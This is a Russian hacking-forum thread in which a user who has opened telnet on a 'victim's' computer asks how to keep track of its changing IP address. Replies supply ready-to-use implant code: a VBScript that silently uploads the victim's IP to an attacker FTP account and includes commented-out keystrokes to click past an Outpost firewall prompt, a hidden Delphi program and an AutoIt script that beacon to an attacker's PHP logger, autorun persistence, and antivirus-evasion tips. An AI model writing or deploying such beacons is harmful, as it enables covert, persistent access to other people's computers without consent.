Форум АНТИЧАТ - Как узнавать IP жертвы с динамичным адресом.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Как узнавать IP жертвы с динамичным адресом. (https://forum.antichat.xyz/showthread.php?t=142183)

Как узнавать IP жертвы с динамичным адресом.

Ситуация: Открыл телнет у компа жертвы. Первый раз зашел на комп, все окей. Но после того как жертва перезагружает тачку меняется IP. Как теперь попасть на комп? Панимаю можно паслать через сетевой снифер. Но постоянно кидать ее на снифер не вариант. Я так думаю... Как разобраться с такой проблемой? Те как всегда знать ее IP?

Те как всегда знать ее IP?
Постоянно коннектится к ней

Вбить в крон инет-качалку со ссылкой на снифер, который запишет айпи в лог. Либо написать маленькую прогу, которая будет делать тоже самое.

Цитата:

Сообщение от Keltos

Те как всегда знать ее IP?
Постоянно коннектится к ней

Перечитай мой пост...

Цитата:

Сообщение от BlackSun

А можно поподробнее и если незатруднит пример...

троя ему залей, и пусть он те логи шлет когда скажешь.
или подключи ему dyndns ))и ему приятно и тебе полезно))))

какого троя то?

Кури в сторону hamachi (как только он будет в сети он будет у тя в онлайне )

shell_c0de, ему нужно IP адрес знать.
Напиши программку которая при наличии подключения к интернету будет каким - либо образом отправлять тебе айпишник(аська, мыло, гейт) и добавь ее в автозагрузку.

блин..... нарыл програмулинку, вроде пахала и ее непалил антивирус.... сегодня начал соберарать все во едино и антивирус палит прогу...
ipbot.exe

Если у тебя есть хост, то:
Заливаешь туда скрипт пыховский:
<?php
file = fopen("log.txt","w");
fwrite(file,$_SERVER['REMOTE_ADDR']);
fclose(file);
?>
На вражеском компе в авторан мини скрипт, запрашивающий эту страничку
Смотрим log.txt и там ву-а-ля: IP жертвы :)

Цитата:

Сообщение от Nik(rus)

"мини скрипт" можно поподробней... И желательно так чтоб каждый час например запрашивал

Лучше всего конечно ASM + Winsock, но можно вполне и на делфи написать. В общем пишешь через indy (компонент IdHTTP) программу, которая будет посылать GET запрос на указанный хост, который в свою очередь содержит скрипт, записывающий в логи айпи. Ну и сделай это все в таймере. Интервал поставь какой надо. И пропиши программу в автозагрузку. Вот собственно и весь метод.

AutoIt код:

Код:

#include <HTTP.au3>

$host = "www.php.jim"

$page = "/some.php"

$http = _HTTPConnect($host)

_HTTPGet($host,$page,$http)

HTTP.au3

Компилиш и вот тебе беспалевный ехешник,как в авторан запихать расказывать не буду, думаю тебе мои способы покажутся палевными :) (я ядро винды не лапаю Oo)

vb script если нужно под себя подделаешь ;)

Код:

On Error Resume Next

newfolderpath = "C:\WEB" 'Папка где находится скрипт

login="фтп-логин"

password="фтп-пасс"

ftpp="ftp.narod.ru"

'=================================================  ===

' Узнаем текущий IP и пишем его в файл

'=================================================  ===

set objLocator = WScript.CreateObject("WbemScripting.SWbemLocator")

    set objService = objLocator.ConnectServer (server, "", username, password)

    strQuery = "Select IPAddress from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE"

    set objEnumerator = objService.ExecQuery(strQuery)

    for each obj in objEnumerator

        if Not IsNull(obj.IPAddress) then 

            for i=LBound(obj.IPAddress) to UBound(obj.IPAddress)

                GetIPaddress = obj.IPAddress(i)

'Узнаем текущий (реальный) наш IP

Str = GetIPaddress

           next

        end if

next

FileDestination = "ip.txt"

Set FSO = CreateObject("Scripting.FileSystemObject")

Set Destination = FSO.CreateTextFile(FileDestination)

Destination.WriteLine Str

set Destination = Nothing

Set FSO = Nothing

set objLocator = Nothing

'=================================================  ==================================================  ============

'Отправляем на фтп текущий IP

'Отсылаем на ФТП на narod.ru

'Создаем файл сценария для FTP.EXE 

set FSO = CreateObject("Scripting.FileSystemObject") 

Set WSHshell = WScript.CreateObject("WScript.Shell") 

Set sDir = WSHshell.Environment("Process")    ' - находим путь к папке Windows 

Set cScript = fso.CreateTextFile (sDir("windir") & "\FTp.scr")  '-Обозначаем место, где будет создан и сохранен файл сценария (в данном случае - папочка виндовз) 

cScript.WriteLine "Open " & ftpp & "" '- Открываем соединение с сайтом ftp.narod.ru на 21 порту 

cScript.WriteLine "" & login & "" '- Имя пользователя 

cScript.WriteLine "" & password & "" '- Пароль 

cScript.WriteLine "drive C:" '- Выбраем диск С

cScript.WriteLine "lcd " & newfolderpath ' - Устанавливаем папку, откуда будем отсылать данные

cScript.WriteLine "prompt" ' - Отключаем всякий диалог по каждому файлу

cScript.WriteLine "binary" ' - метод передачи файлов по FTP

cScript.WriteLine "PUT ip.txt"'- Отправляем IP

cScript.WriteLine "bye" '-разрываем соединение с ftp.narod.ru 

cScript.Close '- Конец записи в файл сценария 

' Запускаем FTP-сценарий 

WSHshell.Run sDir("windir") & "\system32" & "\FTP.ExE -s:" & sDir("windir") & "\FTp.scr", 0

' Обходим фаер (в данном случае Outpost, если надо, раскоментируйте с помощью символа " ' " все строчки, что ниже, до '---------------------------)

'set w=CreateObject("WScript.Shell")

'a=0

'do

'r=W.AppActivate("ftp.exe")

'if r then

'a=1

'w.SendKeys "{tab 2}"

'w.SendKeys "{enter}"

'end if

'loop until a=1

'set w=Nothing

'---------------------------

Set fso = Nothing 

Set WSHshell  = Nothing 

'=================================================  ===

'А теперь запускаем цикл проверки на изменение IP

'=================================================  ===

Const ForReading = 1

Str=1

s=2

if Str<>s then

While 1

WScript.Sleep 10000 ' Сканим на изменение IP раз в 15 минут

    set objLocator = WScript.CreateObject("WbemScripting.SWbemLocator")

    set objService = objLocator.ConnectServer (server, "", username, password)

    strQuery = "Select IPAddress from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE"

    set objEnumerator = objService.ExecQuery(strQuery)

    for each obj in objEnumerator

        if Not IsNull(obj.IPAddress) then 

            for i=LBound(obj.IPAddress) to UBound(obj.IPAddress)

                GetIPaddress = obj.IPAddress(i)

'Узнаем текущий (реальный) наш IP

Str = GetIPaddress

           next

        end if

next

Set FSO = Nothing

set objLocator = Nothing

Set FSO = CreateObject("Scripting.FileSystemObject")

Set ts = FSO.OpenTextFile("ip.txt", ForReading) 

   s = ts.ReadLine 

   ts.Close

Set FSO = Nothing

Set ts = Nothing

if Str<>s then

FileDestination = "ip.txt"

Set FSO = CreateObject("Scripting.FileSystemObject")

Set Destination = FSO.CreateTextFile(FileDestination)

Destination.WriteLine Str

set Destination = Nothing

Set FSO = Nothing

'=================================================  ==================================================  ============

'Отправляем на фтп новый IP (уже в цикле, каждые 15 минут, в случае, если IP изменился)

'Отсылаем на ФТП на narod.ru

'Создаем файл сценария для FTP.EXE 

set FSO = CreateObject("Scripting.FileSystemObject") 

Set WSHshell = WScript.CreateObject("WScript.Shell") 

Set sDir = WSHshell.Environment("Process")    ' - находим путь к папке Windows 

Set cScript = fso.CreateTextFile (sDir("windir") & "\FTp.scr")  '-Обозначаем место, где будет создан и сохранен файл сценария (в данном случае - папочка виндовз) 

cScript.WriteLine "Open " & ftpp & "" '- Открываем соединение с сайтом ftp.narod.ru на 21 порту 

cScript.WriteLine "" & login & "" '- Имя пользователя 

cScript.WriteLine "" & password & "" '- Пароль 

cScript.WriteLine "drive C:" '- Выбраем диск С

cScript.WriteLine "lcd " & newfolderpath ' - Устанавливаем папку, откуда будем отсылать данные

cScript.WriteLine "prompt" ' - Отключаем всякий диалог по каждому файлу

cScript.WriteLine "binary" ' - метод передачи файлов по FTP

cScript.WriteLine "PUT ip.txt"'- Отправляем куки от IE

cScript.WriteLine "bye" '-разрываем соединение с ftp.narod.ru 

cScript.Close '- Конец записи в файл сценария 

' Запускаем FTP-сценарий 

WSHshell.Run sDir("windir") & "\system32" & "\FTP.ExE -s:" & sDir("windir") & "\FTp.scr", 0

' Обходим фаер (в данном случае Outpost, если надо, раскоментируйте с помощью символа " ' " все строчки, что ниже, до '---------------------------)

'set w=CreateObject("WScript.Shell")

'a=0

'do

'r=W.AppActivate("ftp.exe")

'if r then

'a=1

'w.SendKeys "{tab 2}"

'w.SendKeys "{enter}"

'end if

'loop until a=1

'set w=Nothing

'---------------------------

Set fso = Nothing 

Set WSHshell  = Nothing 

end if

Wend

end if

этот скрипт меня не раз выручал ;) Ну в общем дерзай :)

Не работает у меня приходит левый IP

Цитата:

Сообщение от francesko

Не работает у меня приходит левый IP

Ты хотябы со скриптом разобрался ? Как видишь этот скрипт выполняет следующие ф-ции:
1. распознает ВНУТРЕСЕТЕВОЙ ip
2. сохраняет его в txt
3. отправляет его тебе на ftp
...
Ну в общем не чего сложного!
Тебе нужен внутресетевой или внешний ip?

Хм... да ты прав А как его переделать под внешний ip?

Цитата:

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, IdIPWatch, IdBaseComponent, IdComponent, IdTCPConnection,
IdTCPClient, IdHTTP, ExtCtrls;

type
TForm1 = class(TForm)
Timer1: TTimer;
IdHTTP1: TIdHTTP;
IdIPWatch1: TIdIPWatch;
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;
myip: string;

implementation

{$R *.dfm}

procedure TForm1.Timer1Timer(Sender: TObject);
begin
myip:=IdIpWatch1.LocalIP;
IdHTTP1.Get('http://mysite.ru/ip.php?ip=' + myip); //Меняем на свой адрес хоста, где размещен скрипт.
end;

end.

Выставляем интервал таймера. Он отвечает за скорость передачи на скрипт айпи. 1000 = 1 сек.

Затем клацаем Project - View Source, и там дописываем одну строчку - Application.ShowMainForm:=False;

Должно получиться вот так:

Цитата:

program Project1;

uses
Forms,
Unit1 in 'Unit1.pas' {Form1};

{$R *.res}

begin
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.ShowMainForm:=False;
Application.Run;
end.

Это сделает твою программу скрытой.

Вот php скрипт, который принимает IP:

PHP код:


		
			
<?php

$file = fopen("ip.txt","a");

fwrite($file, $_GET['ip']);

fwrite($file, "\r\n");

fclose($file);

?>

Все айпи будут записанные в ip.txt

Nik(rus), а иконка AutoIt в трее совсем не палевная, да? :)

Цитата:

Сообщение от francesko

Не работает у меня приходит левый IP

Обычно все хацкеры стараются получить внутренний ip ;) Зачем тебе внешний?

Внутренний? Кто тебе такое сказал? Зачем тебе внутресетевой айпи? о_О Он нужен только в том случае, если ты подключен к той локальной сети, к которой принадлежит твоя жертва. Тогда можно его использовать для подключения к серверной части backdoor'a. А если подключаться через и-нет, то нужен именно внешний IP.

короче не парься)
вот http://forum.antichat.ru/threadnav84364-1-10.html
не забудь + поставить)

Sams: ну иконка это не трабл)
В начале добавляешь #NoTrayIcon
(а про беспалевность я имел ввиду антивири)

Цитата:

Сообщение от Sams

Вот код на делфи. Передает айпи на скрипт ip.php, который принимает его и записывает в файл ip.txt. Кидаем на форму три компонента - таймер, IdHTTP (Indy Clients) и IdIpWatch (Indy Misc).

Выставляем интервал таймера. Он отвечает за скорость передачи на скрипт айпи. 1000 = 1 сек.

Затем клацаем Project - View Source, и там дописываем одну строчку - Application.ShowMainForm:=False;

Должно получиться вот так:

Это сделает твою программу скрытой.

Вот php скрипт, который принимает IP:

Код:

<?php

$file = fopen("ip.txt","w");

fwrite($file, $_GET['ip']);

fwrite($file, \r\n);

fclose($file);

?>

Все айпи будут записанные в ip.txt

ERROR

Твой скрин с ошибкой не грузиться. Перезалей, если можешь.
Извиняюсь, допустил там маленькую ошибку - не поставил кавычки.

P.S. И еще подправил режим открытия файла с "w" на "a".

PHP код:


		
			
<?php

$file = fopen("ip.txt","a");

fwrite($file, $_GET['ip']);

fwrite($file, "\r\n");

fclose($file);

?>

не читал все сообщения этой темы, поэтому могу повториться.
есть такая штука как ddclient, эта прога связываеться через определенный период с сервером и шлет ей ip, а он в свою очередь присваивает доменное имя. в таком случае обращаться к компу жертвы будешь указывая, в параметрах telnet-клиента то доменное имя, которое присвоил ей при регистрации на dyndns.com (офф.сайт), а не айпи.
на винду ее не ставил, но на линуксе она ставиться как два пальца обо...
обычно эта тему используют админы чтобы поднять какой-то элементарный сервер на машине с динамическим ip, в твоем случае это то что надо, и кодить не надо.

P.S.если ты с жертвой в одной подсети и выходить в инет через один и тотже шлюз, то такая тема не прокатит

есть еще inadyn

Цитата:

Сообщение от Sams

PHP код:


		
			
<?php

$file = fopen("ip.txt","a");

fwrite($file, $_GET['ip']);

fwrite($file, "\r\n");

fclose($file);

?>

http://i014.radikal.ru/0911/6b/69850efaa91ft.jpg

Эм...а на VB примеры есть ? Или там геморно.

Цитата:

Сообщение от GenTao

Эм...а на VB примеры есть ? Или там геморно.

Код:

Dim objHTTP As Object   

Set objHTTP = CreateObject("Microsoft.XMLHTTP")

Call objHTTP.Open("GET", "http://www.ya.ru/", False)

Call objHTTP.Send

Просили у мну такую прогу, если нужна стучи в асю, будет отсылать все ипы машины на твоё мыло.

Цитата:

Сообщение от Nik(rus)

Если у тебя есть хост, то:
Заливаешь туда скрипт пыховский:
<?php
file = fopen("log.txt","w");
fwrite(file,$_SERVER['REMOTE_ADDR']);
fclose(file);
?>
На вражеском компе в авторан мини скрипт, запрашивающий эту страничку
Смотрим log.txt и там ву-а-ля: IP жертвы :)

а есть такой мини скрипт на VB полностью?

динднс можно установить в невидимом режиме (убрать с трея)

Могу написать програмку пиши в icq : 444-8шесть8-181

Открываешь какой-то не стандартный порт, а потом сканишь на этот порт диапазон айпи.